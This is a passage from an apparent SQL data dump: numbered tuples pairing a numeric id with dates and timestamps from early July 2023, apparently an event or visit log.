21:04:08'),(79482,4677,1,'2023-07-02','2023-07-02 21:13:26'),(79483,4677,1,'2023-07-02','2023-07-02 21:13:28'),(79484,4301,1,'2023-07-02','2023-07-02 21:32:08'),(79485,4454,1,'2023-07-02','2023-07-02 21:35:56'),(79486,4524,1,'2023-07-02','2023-07-02 21:58:25'),(79487,4524,1,'2023-07-02','2023-07-02 21:58:27'),(79488,3691,1,'2023-07-02','2023-07-02 22:07:34'),(79489,5101,1,'2023-07-02','2023-07-02 22:20:48'),(79490,5101,1,'2023-07-02','2023-07-02 22:20:50'),(79491,74,1,'2023-07-02','2023-07-02 22:43:18'),(79492,74,1,'2023-07-02','2023-07-02 22:43:21'),(79493,2159,1,'2023-07-02','2023-07-02 22:45:59'),(79494,3790,1,'2023-07-02','2023-07-02 23:35:21'),(79495,3030,1,'2023-07-02','2023-07-02 23:40:29'),(79496,1766,1,'2023-07-02','2023-07-02 23:52:46'),(79497,89,1,'2023-07-03','2023-07-03 00:13:12'),(79498,3087,1,'2023-07-03','2023-07-03 00:20:24'),(79499,1766,1,'2023-07-03','2023-07-03 00:31:38'),(79500,4323,1,'2023-07-03','2023-07-03 00:45:42'),(79501,1766,1,'2023-07-03','2023-07-03 01:00:59'),(79502,4496,1,'2023-07-03','2023-07-03 02:24:02'),(79503,2769,1,'2023-07-03','2023-07-03 03:31:32'),(79504,470,1,'2023-07-03','2023-07-03 03:40:11'),(79505,472,1,'2023-07-03','2023-07-03 03:54:02'),(79506,4703,1,'2023-07-03','2023-07-03 04:10:12'),(79507,470,1,'2023-07-03','2023-07-03 04:11:25'),(79508,470,1,'2023-07-03','2023-07-03 04:20:21'),(79509,5163,1,'2023-07-03','2023-07-03 04:25:12'),(79510,3307,1,'2023-07-03','2023-07-03 04:51:10'),(79511,4697,1,'2023-07-03','2023-07-03 05:25:11'),(79512,4569,1,'2023-07-03','2023-07-03 05:34:02'),(79513,335,1,'2023-07-03','2023-07-03 07:46:20'),(79514,2775,1,'2023-07-03','2023-07-03 07:52:32'),(79515,1608,1,'2023-07-03','2023-07-03 07:53:26'),(79516,570,1,'2023-07-03','2023-07-03 08:04:02'),(79517,91,1,'2023-07-03','2023-07-03 08:17:01'),(79518,4930,1,'2023-07-03','2023-07-03 08:31:15'),(79519,1614,1,'2023-07-03','2023-07-03 09:52:05'),(79520,80,1,'2023-07-03','2023-07-03 09:52:35'),(79521,4776,1,'2023-07-03','2023-07-03 09:55:13'),(79522,4960,1,'2023-07-03','2023-07-03 10:51:55'),(79523,2804,1,'2023-07-03','2023-07-03 11:20:13'),(79524,4960,1,'2023-07-03','2023-07-03 12:06:47'),(79525,1586,1,'2023-07-03','2023-07-03 12:40:10'),(79526,1586,1,'2023-07-03','2023-07-03 12:40:29'),(79527,4608,1,'2023-07-03','2023-07-03 12:47:18'),(79528,1604,1,'2023-07-03','2023-07-03 13:23:06'),(79529,2804,1,'2023-07-03','2023-07-03 13:31:03'),(79530,1770,1,'2023-07-03','2023-07-03 14:05:39'),(79531,91,1,'2023-07-03','2023-07-03 14:28:26'),(79532,4966,1,'2023-07-03','2023-07-03 14:47:16'),(79533,1592,1,'2023-07-03','2023-07-03 14:52:11'),(79534,4753,1,'2023-07-03','2023-07-03 14:59:38'),(79535,4753,1,'2023-07-03','2023-07-03 15:23:16'),(79536,4977,1,'2023-07-03','2023-07-03 15:23:58'),(79537,5163,1,'2023-07-03','2023-07-03 15:49:17'),(79538,5334,1,'2023-07-03','2023-07-03 16:19:23'),(79539,1604,1,'2023-07-03','2023-07-03 16:34:05'),(79540,80,1,'2023-07-03','2023-07-03 16:34:52'),(79541,1594,1,'2023-07-03','2023-07-03 16:46:45'),(79542,5363,1,'2023-07-03','2023-07-03 16:50:29'),(79543,4911,1,'2023-07-03','2023-07-03 16:54:23'),(79544,2159,1,'2023-07-03','2023-07-03 16:56:38'),(79545,3781,1,'2023-07-03','2023-07-03 17:29:03'),(79546,3781,1,'2023-07-03','2023-07-03 17:33:53'),(79547,5320,1,'2023-07-03','2023-07-03 18:18:48'),(79548,1604,1,'2023-07-03','2023-07-03 19:46:29'),(79549,80,1,'2023-07-03','2023-07-03 19:47:11'),(79550,1604,1,'2023-07-03','2023-07-03 19:47:32'),(79551,1604,1,'2023-07-03','2023-07-03 19:49:30'),(79552,87,1,'2023-07-03','2023-07-03 19:49:50'),(79553,4980,1,'2023-07-03','2023-07-03 20:54:10'),(79554,4938,1,'2023-07-03','2023-07-03 21:19:26'),(79555,3781,1,'2023-07-03','2023-07-03 21:30:14'),(79556,4977,1,'2023-07-03','2023-07-03 22:24:09'),(79557,3664,1,'2023-07-03','2023-07-03 22:41:15'),(79558,3781,1,'2023-07-03','2023-07-03 22:44:28'),(79559,4412,1,'2023-07-04','2023-07-04 00:07:50'),(79560,2809,1,'2023-07-04','2023-07-04 00:51:23'),(79561,4911,1,'2023-07-04','2023-07-04 01:09:06'),(79562,4911,1,'2023-07-04','2023-07-04 01:10:12'),(79563,5253,1,'2023-07-04','2023-07-04 01:17:56'),(79564,4944,1,'2023-07-04','2023-07-04 01:42:10'),(79565,108,1,'2023-07-04','2023-07-04 01:44:34'),(79566,5163,1,'2023-07-04','2023-07-04 01:47:03'),(79567,1582,1,'2023-07-04','2023-07-04 02:00:32'),(79568,4776,1,'2023-07-04','2023-07-04 02:13:35'),(79569,474,1,'2023-07-04','2023-07-04 02:20:06'),(79570,4697,1,'2023-07-04','2023-07-04 02:28:24'),(79571,4454,1,'2023-07-04','2023-07-04 02:29:36'),(79572,5307,1,'2023-07-04','2023-07-04 02:55:54'),(79573,4612,1,'2023-07-04','2023-07-04 03:01:10'),(79574,4517,1,'2023-07-04','2023-07-04 03:07:09'),(79575,3030,1,'2023-07-04','2023-07-04 03:08:40'),(79576,5363,1,'2023-07-04','2023-07-04 03:12:48'),(79577,4612,1,'2023-07-04','2023-07-04 03:47:49'),(79578,91,1,'2023-07-04','2023-07-04 07:29:03'),(79579,2503,1,'2023-07-04','2023-07-04 07:31:32'),(79580,5122,1,'2023-07-04','2023-07-04 07:40:12'),(79581,4911,1,'2023-07-04','2023-07-04 09:46:33'),(79582,68,1,'2023-07-04','2023-07-04 09:49:54'),(79583,4911,1,'2023-07-04','2023-07-04 10:08:44'),(79584,5163,1,'2023-07-04','2023-07-04 10:19:01'),(79585,3251,1,'2023-07-04','2023-07-04 11:05:43'),(79586,76,1,'2023-07-04','2023-07-04 11:06:53'),(79587,4457,1,'2023-07-04','2023-07-04 11:07:02'),(79588,1870,1,'2023-07-04','2023-07-04 11:08:51'),(79589,84,1,'2023-07-04','2023-07-04 11:09:29'),(79590,3694,1,'2023-07-04','2023-07-04 11:10:56'),(79591,3251,1,'2023-07-04','2023-07-04 11:30:15'),(79592,84,1,'2023-07-04','2023-07-04 11:30:30'),(79593,3694,1,'2023-07-04','2023-07-04 11:30:50'),(79594,4412,1,'2023-07-04','2023-07-04 11:37:27'),(79595,1724,1,'2023-07-04','2023-07-04 11:49:03'),(79596,4911,1,'2023-07-04','2023-07-04 11:50:46'),(79597,80,1,'2023-07-04','2023-07-04 11:51:05'),(79598,4911,1,'2023-07-04','2023-07-04 11:52:45'),(79599,91,1,'2023-07-04','2023-07-04 12:28:41'),(79600,2558,1,'2023-07-04','2023-07-04 12:59:21'),(79601,1544,1,'2023-07-04','2023-07-04 13:36:33'),(79602,3764,1,'2023-07-04','2023-07-04 13:56:16'),(79603,4275,1,'2023-07-04','2023-07-04 14:03:05'),(79604,4911,1,'2023-07-04','2023-07-04 14:03:39'),(79605,3240,1,'2023-07-04','2023-07-04 14:15:27'),(79606,80,1,'2023-07-04','2023-07-04 14:32:46'),(79607,4966,1,'2023-07-04','2023-07-04 14:42:31'),(79608,1596,1,'2023-07-04','2023-07-04 15:30:23'),(79609,5125,1,'2023-07-04','2023-07-04 15:32:49'),(79610,5280,1,'2023-07-04','2023-07-04 15:32:57'),(79611,5001,1,'2023-07-04','2023-07-04 15:34:15'),(79612,1870,1,'2023-07-04','2023-07-04 16:05:44'),(79613,473,1,'2023-07-04','2023-07-04 16:05:44'),(79614,3781,1,'2023-07-04','2023-07-04 16:28:30'),(79615,2804,1,'2023-07-04','2023-07-04 17:47:59'),(79616,3251,1,'2023-07-04','2023-07-04 17:56:33'),(79617,5307,1,'2023-07-04','2023-07-04 17:57:55'),(79618,4412,1,'2023-07-04','2023-07-04 18:37:41'),(79619,4911,1,'2023-07-04','2023-07-04 18:53:09'),(79620,4960,1,'2023-07-04','2023-07-04 19:02:49'),(79621,3060,1,'2023-07-04','2023-07-04 19:23:29'),(79622,4950,1,'2023-07-04','2023-07-04 19:42:00'),(79623,1582,1,'2023-07-04','2023-07-04 19:58:06'),(79624,4911,1,'2023-07-04','2023-07-04 21:44:10'),(79625,4911,1,'2023-07-04','2023-07-04 21:47:20'),(79626,474,1,'2023-07-04','2023-07-04 21:53:39'),(79627,5292,1,'2023-07-04','2023-07-04 22:55:11'),(79628,4911,1,'2023-07-04','2023-07-04 22:59:49'),(79629,472,1,'2023-07-04','2023-07-04 23:33:45'),(79630,3764,1,'2023-07-04','2023-07-04 23:34:03'),(79631,4608,1,'2023-07-04','2023-07-04 23:36:41'),(79632,1582,1,'2023-07-04','2023-07-04 23:37:00'),(79633,4432,1,'2023-07-04','2023-07-04 23:41:00'),(79634,3087,1,'2023-07-04','2023-07-04 23:43:16'),(79635,3030,1,'2023-07-04','2023-07-04 23:46:42'),(79636,3781,1,'2023-07-05','2023-07-05 00:03:08'),(79637,4874,1,'2023-07-05','2023-07-05 00:51:02'),(79638,2410,1,'2023-07-05','2023-07-05 01:48:22'),(79639,4874,1,'2023-07-05','2023-07-05 01:52:17'),(79640,4712,1,'2023-07-05','2023-07-05 02:35:02'),(79641,4712,1,'2023-07-05','2023-07-05 02:35:04'),(79642,4566,1,'2023-07-05','2023-07-05 03:06:44'),(79643,4566,1,'2023-07-05','2023-07-05 03:06:45'),(79644,4520,1,'2023-07-05','2023-07-05 03:38:25'),(79645,4520,1,'2023-07-05','2023-07-05 03:41:21'),(79646,4738,1,'2023-07-05','2023-07-05 03:43:41'),(79647,5280,1,'2023-07-05','2023-07-05 03:56:25'),(79648,5280,1,'2023-07-05','2023-07-05 03:56:27'),(79649,3727,1,'2023-07-05','2023-07-05 04:00:36'),(79650,4738,1,'2023-07-05','2023-07-05 04:17:32'),(79651,2904,1,'2023-07-05','2023-07-05 04:18:00'),(79652,4551,1,'2023-07-05','2023-07-05 04:33:16'),(79653,4529,1,'2023-07-05','2023-07-05 04:47:53'),(79654,2159,1,'2023-07-05','2023-07-05 04:55:20'),(79655,4514,1,'2023-07-05','2023-07-05 05:02:25'),(79656,4514,1,'2023-07-05','2023-07-05 05:02:27'),(79657,4517,1,'2023-07-05','2023-07-05 05:17:31'),(79658,4911,1,'2023-07-05','2023-07-05 05:28:05'),(79659,4911,1,'2023-07-05','2023-07-05 05:28:32'),(79660,5137,1,'2023-07-05','2023-07-05 05:32:24'),(79661,5137,1,'2023-07-05','2023-07-05 05:32:26'),(79662,4960,1,'2023-07-05','2023-07-05 05:41:30'),(79663,91,1,'2023-07-05','2023-07-05 05:41:52'),(79664,91,1,'2023-07-05','2023-07-05 05:43:48'),(79665,4960,1,'2023-07-05','2023-07-05 05:43:49'),(79666,1701,1,'2023-07-05','2023-07-05 06:05:22'),(79667,2410,1,'2023-07-05','2023-07-05 06:14:13'),(79668,5131,1,'2023-07-05','2023-07-05 06:22:37'),(79669,3307,1,'2023-07-05','2023-07-05 06:25:06'),(79670,5268,1,'2023-07-05','2023-07-05 07:02:27'),(79671,5268,1,'2023-07-05','2023-07-05 07:02:31'),(79672,4802,1,'2023-07-05','2023-07-05 07:07:59'),(79673,2813,1,'2023-07-05','2023-07-05 07:09:25'),(79674,3053,1,'2023-07-05','2023-07-05 07:35:30'),(79675,76,1,'2023-07-05','2023-07-05 07:52:45'),(79676,5131,1,'2023-07-05','2023-07-05 08:28:17'),(79677,4612,1,'2023-07-05','2023-07-05 08:29:31'),(79678,4911,1,'2023-07-05','2023-07-05 08:39:39'),(79679,4983,1,'2023-07-05','2023-07-05 09:03:47'),(79680,1596,1,'2023-07-05','2023-07-05 09:41:06'),(79681,5163,1,'2023-07-05','2023-07-05 10:07:54'),(79682,4911,1,'2023-07-05','2023-07-05 10:15:29'),(79683,1582,1,'2023-07-05','2023-07-05 10:37:13'),(79684,3707,1,'2023-07-05','2023-07-05 11:21:48'),(79685,467,1,'2023-07-05','2023-07-05 12:08:59'),(79686,1747,1,'2023-07-05','2023-07-05 12:38:25'),(79687,4520,1,'2023-07-05','2023-07-05 12:42:12'),(79688,5323,1,'2023-07-05','2023-07-05 13:09:46'),(79689,1544,1,'2023-07-05','2023-07-05 13:20:46'),(79690,4911,1,'2023-07-05','2023-07-05 13:21:45'),(79691,5276,1,'2023-07-05','2023-07-05 13:24:04'),(79692,4520,1,'2023-07-05','2023-07-05 13:44:32'),(79693,5024,1,'2023-07-05','2023-07-05 13:50:05'),(79694,4938,1,'2023-07-05','2023-07-05 14:00:09'),(79695,1747,1,'2023-07-05','2023-07-05 14:05:40'),(79696,3727,1,'2023-07-05','2023-07-05 14:21:59'),(79697,5307,1,'2023-07-05','2023-07-05 14:54:43'),(79698,4960,1,'2023-07-05','2023-07-05 14:56:47'),(79699,3735,1,'2023-07-05','2023-07-05 15:06:12'),(79700,4938,1,'2023-07-05','2023-07-05 15:09:54'),(79701,5276,1,'2023-07-05','2023-07-05 15:10:00'),(79702,3764,1,'2023-07-05','2023-07-05 15:12:28'),(79703,472,1,'2023-07-05','2023-07-05 15:50:09'),(79704,4976,1,'2023-07-05','2023-07-05 16:11:02'),(79705,4911,1,'2023-07-05','2023-07-05 16:26:49'),(79706,2904,1,'2023-07-05','2023-07-05 16:27:28'),(79707,2904,1,'2023-07-05','2023-07-05 16:27:30'),(79708,2904,1,'2023-07-05','2023-07-05 16:28:32'),(79709,5280,1,'2023-07-05','2023-07-05 16:28:52'),(79710,2904,1,'2023-07-05','2023-07-05 16:30:19'),(79711,4911,1,'2023-07-05','2023-07-05 16:55:37'),(79712,1582,1,'2023-07-05','2023-07-05 18:03:15'),(79713,91,1,'2023-07-05','2023-07-05 18:04:22'),(79714,3023,1,'2023-07-05','2023-07-05 18:04:23'),(79715,5054,1,'2023-07-05','2023-07-05 18:06:06'),(79716,91,1,'2023-07-05','2023-07-05 18:06:24'),(79717,4454,1,'2023-07-05','2023-07-05 18:49:45'),(79718,3045,1,'2023-07-05','2023-07-05 18:50:02'),(79719,5268,1,'2023-07-05','2023-07-05 19:50:20'),(79720,2989,1,'2023-07-05','2023-07-05 20:23:34'),(79721,474,1,'2023-07-05','2023-07-05 20:35:21'),(79722,5264,1,'2023-07-05','2023-07-05 20:40:01'),(79723,4566,1,'2023-07-05','2023-07-05 21:20:23'),(79724,2558,1,'2023-07-05','2023-07-05 23:19:46'),(79725,5314,1,'2023-07-06','2023-07-06 00:34:46'),(79726,4960,1,'2023-07-06','2023-07-06 01:03:42'),(79727,468,1,'2023-07-06','2023-07-06 01:50:20'),(79728,3090,1,'2023-07-06','2023-07-06 02:36:28'),(79729,4759,1,'2023-07-06','2023-07-06 02:57:48'),(79730,4759,1,'2023-07-06','2023-07-06 03:05:26'),(79731,76,1,'2023-07-06','2023-07-06 03:16:37'),(79732,468,1,'2023-07-06','2023-07-06 03:21:53'),(79733,1701,1,'2023-07-06','2023-07-06 03:27:52'),(79734,3307,1,'2023-07-06','2023-07-06 04:05:21'),(79735,3030,1,'2023-07-06','2023-07-06 04:21:47'),(79736,4301,1,'2023-07-06','2023-07-06 05:04:24'),(79737,2904,1,'2023-07-06','2023-07-06 05:29:30'),(79738,4556,1,'2023-07-06','2023-07-06 06:20:05'),(79739,4759,1,'2023-07-06','2023-07-06 06:52:52'),(79740,4938,1,'2023-07-06','2023-07-06 07:11:16'),(79741,4944,1,'2023-07-06','2023-07-06 08:52:52'),(79742,4911,1,'2023-07-06','2023-07-06 09:35:56'),(79743,68,1,'2023-07-06','2023-07-06 09:36:26'),(79744,91,1,'2023-07-06','2023-07-06 09:37:10'),(79745,76,1,'2023-07-06','2023-07-06 09:37:53'),(79746,80,1,'2023-07-06','2023-07-06 09:38:46'),(79747,76,1,'2023-07-06','2023-07-06 09:38:57'),(79748,91,1,'2023-07-06','2023-07-06 09:38:58'),(79749,4963,1,'2023-07-06','2023-07-06 11:43:17'),(79750,80,1,'2023-07-06','2023-07-06 11:44:09'),(79751,4963,1,'2023-07-06','2023-07-06 11:44:32'),(79752,4759,1,'2023-07-06','2023-07-06 11:53:13'),(79753,474,1,'2023-07-06','2023-07-06 12:14:28'),(79754,473,1,'2023-07-06','2023-07-06 12:14:28'),(79755,1602,1,'2023-07-06','2023-07-06 12:16:21'),(79756,91,1,'2023-07-06','2023-07-06 12:16:49'),(79757,1602,1,'2023-07-06','2023-07-06 12:17:18'),(79758,1870,1,'2023-07-06','2023-07-06 12:31:02'),(79759,473,1,'2023-07-06','2023-07-06 12:31:02'),(79760,4498,1,'2023-07-06','2023-07-06 13:07:56'),(79761,1612,1,'2023-07-06','2023-07-06 13:20:40'),(79762,91,1,'2023-07-06','2023-07-06 13:31:25'),(79763,1612,1,'2023-07-06','2023-07-06 13:51:17'),(79764,4485,1,'2023-07-06','2023-07-06 14:09:16'),(79765,4966,1,'2023-07-06','2023-07-06 14:22:59'),(79766,3030,1,'2023-07-06','2023-07-06 15:11:03'),(79767,3313,1,'2023-07-06','2023-07-06 15:33:32'),(79768,3034,1,'2023-07-06','2023-07-06 16:17:11'),(79769,4944,1,'2023-07-06','2023-07-06 16:30:56'),(79770,470,1,'2023-07-06','2023-07-06 16:32:26'),(79771,1774,1,'2023-07-06','2023-07-06 16:50:55'),(79772,5320,1,'2023-07-06','2023-07-06 17:02:58'),(79773,3102,1,'2023-07-06','2023-07-06 17:16:20'),(79774,1724,1,'2023-07-06','2023-07-06 17:56:22'),(79775,4759,1,'2023-07-06','2023-07-06 18:30:20'),(79776,4753,1,'2023-07-06','2023-07-06 18:45:28'),(79777,4960,1,'2023-07-06','2023-07-06 20:50:59'),(79778,4759,1,'2023-07-06','2023-07-06 21:03:55'),(79779,4911,1,'2023-07-06','2023-07-06 22:40:47'),(79780,3090,1,'2023-07-06','2023-07-06 23:15:31'),(79781,4759,1,'2023-07-06','2023-07-06 23:54:53'),(79782,4963,1,'2023-07-07','2023-07-07 00:24:14'),(79783,4966,1,'2023-07-07','2023-07-07 00:45:35'),(79784,4930,1,'2023-07-07','2023-07-07 00:46:13'),(79785,4950,1,'2023-07-07','2023-07-07 00:46:45'),(79786,4930,1,'2023-07-07','2023-07-07 00:48:25'),(79787,4966,1,'2023-07-07','2023-07-07 00:48:33'),(79788,4930,1,'2023-07-07','2023-07-07 00:49:39'),(79789,3092,1,'2023-07-07','2023-07-07 00:49:58'),(79790,68,1,'2023-07-07','2023-07-07 00:51:02'),(79791,76,1,'2023-07-07','2023-07-07 00:52:02'),(79792,4930,1,'2023-07-07','2023-07-07 00:53:24'),(79793,4930,1,'2023-07-07','2023-07-07 00:54:42'),(79794,76,1,'2023-07-07','2023-07-07 00:54:46'),(79795,68,1,'2023-07-07','2023-07-07 00:54:53'),(79796,4930,1,'2023-07-07','2023-07-07 00:54:56'),(79797,4966,1,'2023-07-07','2023-07-07 00:55:06'),(79798,1772,1,'2023-07-07','2023-07-07 01:09:57'),(79799,4785,1,'2023-07-07','2023-07-07 02:02:11'),(79800,4950,1,'2023-07-07','2023-07-07 02:02:15'),(79801,3781,1,'2023-07-07','2023-07-07 02:15:25'),(79802,2609,1,'2023-07-07','2023-07-07 02:24:55'),(79803,1774,1,'2023-07-07','2023-07-07 03:03:56'),(79804,91,1,'2023-07-07','2023-07-07 03:39:57'),(79805,3764,1,'2023-07-07','2023-07-07 03:52:05'),(79806,3764,1,'2023-07-07','2023-07-07 05:38:09'),(79807,1720,1,'2023-07-07','2023-07-07 05:42:48'),(79808,3787,1,'2023-07-07','2023-07-07 05:50:14'),(79809,4960,1,'2023-07-07','2023-07-07 06:09:25'),(79810,4700,1,'2023-07-07','2023-07-07 06:42:55'),(79811,4911,1,'2023-07-07','2023-07-07 07:08:12'),(79812,4576,1,'2023-07-07','2023-07-07 07:38:08'),(79813,4508,1,'2023-07-07','2023-07-07 09:46:02'),(79814,3269,1,'2023-07-07','2023-07-07 10:42:40'),(79815,3664,1,'2023-07-07','2023-07-07 10:44:41'),(79816,1582,1,'2023-07-07','2023-07-07 11:22:08'),(79817,5134,1,'2023-07-07','2023-07-07 12:01:25'),(79818,487,1,'2023-07-07','2023-07-07 12:27:00'),(79819,473,1,'2023-07-07','2023-07-07 12:27:00'),(79820,473,1,'2023-07-07','2023-07-07 12:30:17'),(79821,487,1,'2023-07-07','2023-07-07 12:30:23'),(79822,5163,1,'2023-07-07','2023-07-07 12:40:51'),(79823,5163,1,'2023-07-07','2023-07-07 12:43:27'),(79824,1870,1,'2023-07-07','2023-07-07 12:43:31'),(79825,473,1,'2023-07-07','2023-07-07 12:43:31'),(79826,4911,1,'2023-07-07','2023-07-07 13:36:38'),(79827,1582,1,'2023-07-07','2023-07-07 14:01:19'),(79828,4759,1,'2023-07-07','2023-07-07 14:01:47'),(79829,5280,1,'2023-07-07','2023-07-07 14:06:05'),(79830,473,1,'2023-07-07','2023-07-07 14:28:05'),(79831,487,1,'2023-07-07','2023-07-07 14:28:05'),(79832,473,1,'2023-07-07','2023-07-07 14:31:20'),(79833,487,1,'2023-07-07','2023-07-07 14:31:22'),(79834,4759,1,'2023-07-07','2023-07-07 14:46:13'),(79835,1586,1,'2023-07-07','2023-07-07 14:47:50'),(79836,4960,1,'2023-07-07','2023-07-07 15:26:31'),(79837,3030,1,'2023-07-07','2023-07-07 16:16:13'),(79838,5125,1,'2023-07-07','2023-07-07 16:22:15'),(79839,5125,1,'2023-07-07','2023-07-07 16:22:18'),(79840,4911,1,'2023-07-07','2023-07-07 18:15:43'),(79841,1586,1,'2023-07-07','2023-07-07 18:57:44'),(79842,5122,1,'2023-07-07','2023-07-07 20:07:04'),(79843,5122,1,'2023-07-07','2023-07-07 20:07:06'),(79844,5128,1,'2023-07-07','2023-07-07 20:19:04'),(79845,5128,1,'2023-07-07','2023-07-07 20:19:05'),(79846,5134,1,'2023-07-07','2023-07-07 20:30:59'),(79847,5134,1,'2023-07-07','2023-07-07 20:31:01'),(79848,570,1,'2023-07-07','2023-07-07 20:39:35'),(79849,470,1,'2023-07-07','2023-07-07 20:42:58'),(79850,470,1,'2023-07-07','2023-07-07 20:42:59'),(79851,5317,1,'2023-07-07','2023-07-07 20:54:54'),(79852,5317,1,'2023-07-07','2023-07-07 20:54:56'),(79853,474,1,'2023-07-07','2023-07-07 20:58:49'),(79854,4960,1,'2023-07-07','2023-07-07 21:00:56'),(79855,4960,1,'2023-07-07','2023-07-07 21:06:49'),(79856,5314,1,'2023-07-07','2023-07-07 21:06:52'),(79857,5314,1,'2023-07-07','2023-07-07 21:06:53'),(79858,4960,1,'2023-07-07','2023-07-07 21:08:49'),(79859,4977,1,'2023-07-07','2023-07-07 21:12:46'),(79860,5320,1,'2023-07-07','2023-07-07 21:18:49'),(79861,5320,1,'2023-07-07','2023-07-07 21:18:51'),(79862,1598,1,'2023-07-07','2023-07-07 21:50:15'),(79863,5122,1,'2023-07-07','2023-07-07 21:54:35'),(79864,5323,1,'2023-07-07','2023-07-07 22:27:01'),(79865,5323,1,'2023-07-07','2023-07-07 22:27:03'),(79866,1592,1,'2023-07-07','2023-07-07 22:29:14'),(79867,4911,1,'2023-07-07','2023-07-07 22:37:50'),(79868,80,1,'2023-07-07','2023-07-07 22:48:42'),(79869,4612,1,'2023-07-07','2023-07-07 23:40:38'),(79870,4759,1,'2023-07-08','2023-07-08 00:22:12'),(79871,1718,1,'2023-07-08','2023-07-08 00:58:17'),(79872,1749,1,'2023-07-08','2023-07-08 01:13:17'),(79873,4498,1,'2023-07-08','2023-07-08 02:28:18'),(79874,3706,1,'2023-07-08','2023-07-08 02:49:19'),(79875,4387,1,'2023-07-08','2023-07-08 02:49:23'),(79876,4747,1,'2023-07-08','2023-07-08 03:25:18'),(79877,4387,1,'2023-07-08','2023-07-08 03:34:21'),(79878,3706,1,'2023-07-08','2023-07-08 03:34:23'),(79879,4363,1,'2023-07-08','2023-07-08 06:53:17'),(79880,2503,1,'2023-07-08','2023-07-08 09:53:18'),(79881,2309,1,'2023-07-08','2023-07-08 10:06:18'),(79882,3079,1,'2023-07-08','2023-07-08 11:01:51'),(79883,4542,1,'2023-07-08','2023-07-08 11:33:24'),(79884,1697,1,'2023-07-08','2023-07-08 12:14:07'),(79885,5067,1,'2023-07-08','2023-07-08 12:42:56'),(79886,4759,1,'2023-07-08','2023-07-08 14:02:21'),(79887,5356,1,'2023-07-08','2023-07-08 14:07:07'),(79888,4335,1,'2023-07-08','2023-07-08 14:11:58'),(79889,5080,1,'2023-07-08','2023-07-08 14:38:07'),(79890,2309,1,'2023-07-08','2023-07-08 14:47:49'),(79891,4485,1,'2023-07-08','2023-07-08 15:32:17'),(79892,3245,1,'2023-07-08','2023-07-08 15:45:52'),(79893,473,1,'2023-07-08','2023-07-08 15:55:35'),(79894,1610,1,'2023-07-08','2023-07-08 16:01:24'),(79895,3791,1,'2023-07-08','2023-07-08 16:05:14'),(79896,4980,1,'2023-07-08','2023-07-08 16:19:53'),(79897,5276,1,'2023-07-08','2023-07-08 16:35:42'),(79898,1600,1,'2023-07-08','2023-07-08 16:43:03'),(79899,5271,1,'2023-07-08','2023-07-08 16:49:09'),(79900,4485,1,'2023-07-08','2023-07-08 17:02:18'),(79901,3290,1,'2023-07-08','2023-07-08 17:03:47'),(79902,3791,1,'2023-07-08','2023-07-08 17:18:28'),(79903,1582,1,'2023-07-08','2023-07-08 17:27:02'),(79904,474,1,'2023-07-08','2023-07-08 17:33:04'),(79905,87,1,'2023-07-08','2023-07-08 17:48:41'),(79906,3285,1,'2023-07-08','2023-07-08 19:43:45'),(79907,4911,1,'2023-07-08','2023-07-08 20:47:41'),(79908,5001,1,'2023-07-09','2023-07-09 00:02:28'),(79909,5280,1,'2023-07-09','2023-07-09 00:09:37'),(79910,468,1,'2023-07-09','2023-07-09 01:32:30'),(79911,3030,1,'2023-07-09','2023-07-09 03:02:29'),(79912,1745,1,'2023-07-09','2023-07-09 03:24:22'),(79913,5259,1,'2023-07-09','2023-07-09 04:05:21'),(79914,2911,1,'2023-07-09','2023-07-09 04:05:28'),(79915,2911,1,'2023-07-09','2023-07-09 04:16:36'),(79916,4759,1,'2023-07-09','2023-07-09 04:27:52'),(79917,5326,1,'2023-07-09','2023-07-09 04:32:38'),(79918,4759,1,'2023-07-09','2023-07-09 04:39:06'),(79919,68,1,'2023-07-09','2023-07-09 05:12:02'),(79920,5001,1,'2023-07-09','2023-07-09 05:18:53'),(79921,4753,1,'2023-07-09','2023-07-09 05:43:34'),(79922,4753,1,'2023-07-09','2023-07-09 05:43:36'),(79923,4976,1,'2023-07-09','2023-07-09 06:29:03'),(79924,4976,1,'2023-07-09','2023-07-09 06:29:04'),(79925,4750,1,'2023-07-09','2023-07-09 06:42:39'),(79926,5334,1,'2023-07-09','2023-07-09 06:58:22'),(79927,5334,1,'2023-07-09','2023-07-09 06:58:24'),(79928,4977,1,'2023-07-09','2023-07-09 07:20:52'),(79929,4977,1,'2023-07-09','2023-07-09 07:20:54'),(79930,68,1,'2023-07-09','2023-07-09 07:34:54'),(79931,4983,1,'2023-07-09','2023-07-09 07:43:22'),(79932,4983,1,'2023-07-09','2023-07-09 07:43:31'),(79933,474,1,'2023-07-09','2023-07-09 08:05:54'),(79934,474,1,'2023-07-09','2023-07-09 08:05:56'),(79935,4988,1,'2023-07-09','2023-07-09 08:28:22'),(79936,4988,1,'2023-07-09','2023-07-09 08:28:24'),(79937,4768,1,'2023-07-09','2023-07-09 08:50:52'),(79938,4768,1,'2023-07-09','2023-07-09 08:50:54'),(79939,487,1,'2023-07-09','2023-07-09 09:13:23'),(79940,487,1,'2023-07-09','2023-07-09 09:13:24'),(79941,4980,1,'2023-07-09','2023-07-09 10:43:22'),(79942,4980,1,'2023-07-09','2023-07-09 10:43:24'),(79943,4391,1,'2023-07-09','2023-07-09 11:36:42'),(79944,5054,1,'2023-07-09','2023-07-09 11:58:17'),(79945,5295,1,'2023-07-09','2023-07-09 12:37:37'),(79946,3771,1,'2023-07-09','2023-07-09 14:01:38'),(79947,468,1,'2023-07-09','2023-07-09 14:05:12'),(79948,4759,1,'2023-07-09','2023-07-09 14:05:38'),(79949,473,1,'2023-07-09','2023-07-09 14:06:27'),(79950,4759,1,'2023-07-09','2023-07-09 14:28:22'),(79951,4391,1,'2023-07-09','2023-07-09 14:45:05'),(79952,3710,1,'2023-07-09','2023-07-09 16:11:49'),(79953,4391,1,'2023-07-09','2023-07-09 17:16:30'),(79954,5295,1,'2023-07-09','2023-07-09 17:38:02'),(79955,473,1,'2023-07-09','2023-07-09 17:59:38'),(79956,1606,1,'2023-07-09','2023-07-09 19:29:38'),(79957,4911,1,'2023-07-09','2023-07-09 19:37:50'),(79958,4911,1,'2023-07-09','2023-07-09 19:39:27'),(79959,2956,1,'2023-07-09','2023-07-09 19:57:25'),(79960,5024,1,'2023-07-09','2023-07-09 20:33:05'),(79961,4618,1,'2023-07-09','2023-07-09 20:36:14'),(79962,4485,1,'2023-07-09','2023-07-09 20:44:37'),(79963,4485,1,'2023-07-09','2023-07-09 21:29:36'),(79964,3771,1,'2023-07-09','2023-07-09 22:23:40'),(79965,3664,1,'2023-07-09','2023-07-09 23:58:28'),(79966,4612,1,'2023-07-10','2023-07-10 00:11:26'),(79967,4759,1,'2023-07-10','2023-07-10 